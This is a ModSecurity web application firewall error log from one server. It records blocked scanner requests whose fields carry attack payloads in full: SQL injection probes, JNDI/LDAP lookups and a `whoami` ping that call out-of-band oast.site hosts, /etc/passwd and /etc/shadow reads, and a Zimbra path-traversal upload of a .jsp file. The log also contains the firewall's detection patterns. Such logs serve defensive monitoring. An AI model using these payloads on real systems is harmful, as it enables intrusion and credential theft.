[Tue Aug 29 11:33:59.106006 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASRn-IAAAAW"]
[Tue Aug 29 11:33:59.330677 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASUXysAAAAd"]
[Tue Aug 29 11:34:00.385667 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASMgd4AAAAO"]
[Tue Aug 29 11:34:01.430838 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAAQKOrkAAAAs"]
[Tue Aug 29 11:34:03.366714 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg573bocgctuatw.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASLqBwAAAAM"]
[Tue Aug 29 11:34:04.384881 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgtcdh6opmn5ydp.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASMgfMAAAAO"]
[Tue Aug 29 11:34:06.429155 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASQp-wAAAAT"]
[Tue Aug 29 11:34:07.295973 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAARdiPEAAAAK"]
[Tue Aug 29 11:34:07.324982 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAPLwFgAAAAX"]
[Tue Aug 29 11:34:08.304685 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASNzo4AAAAQ"]
[Tue Aug 29 11:34:08.328172 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASK4eQAAAAI"]
[Tue Aug 29 11:34:08.378010 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASfNuUAAAAg"]
[Tue Aug 29 11:34:09.347293 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAST5AQAAAAZ"]
[Tue Aug 29 11:34:10.307168 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAQKOsgAAAAs"]
[Tue Aug 29 11:34:10.307956 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASI0AoAAAAG"]
[Tue Aug 29 11:34:10.358868 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgtnkdszkhstas9.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAARQ4GQAAAAB"]
[Tue Aug 29 11:34:11.358288 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASI0A4AAAAG"]
[Tue Aug 29 11:34:11.444809 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg3x9ty1r5ywjyr.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg3x9ty1r5ywjyr.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlghb3xfyzjhpx4b.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASEJTgAAAAE"]
[Tue Aug 29 11:34:12.420475 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAASEJToAAAAE"]
[Tue Aug 29 11:34:13.311497 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAAShCWIAAAAi"]
[Tue Aug 29 11:34:15.318943 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgfyx7e45o9y7gd.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgfyx7e45o9y7gd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASI0BoAAAAG"]
[Tue Aug 29 11:34:15.349650 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASEJUEAAAAE"]
[Tue Aug 29 11:34:16.342761 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASS7@wAAAAY"]
[Tue Aug 29 11:34:16.347135 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfkip.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAPLwHMAAAAX"]
[Tue Aug 29 11:34:16.347405 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAPLwHMAAAAX"]
[Tue Aug 29 11:34:16.362901 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASS7@0AAAAY"]
[Tue Aug 29 11:34:17.325610 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASNzqUAAAAQ"]
[Tue Aug 29 11:34:19.304761 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASK4gUAAAAI"]
[Tue Aug 29 11:34:19.330286 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASS7-oAAAAY"]
[Tue Aug 29 11:34:19.402699 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgcmgnthmhwxr33.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASGMvMAAAAA"]
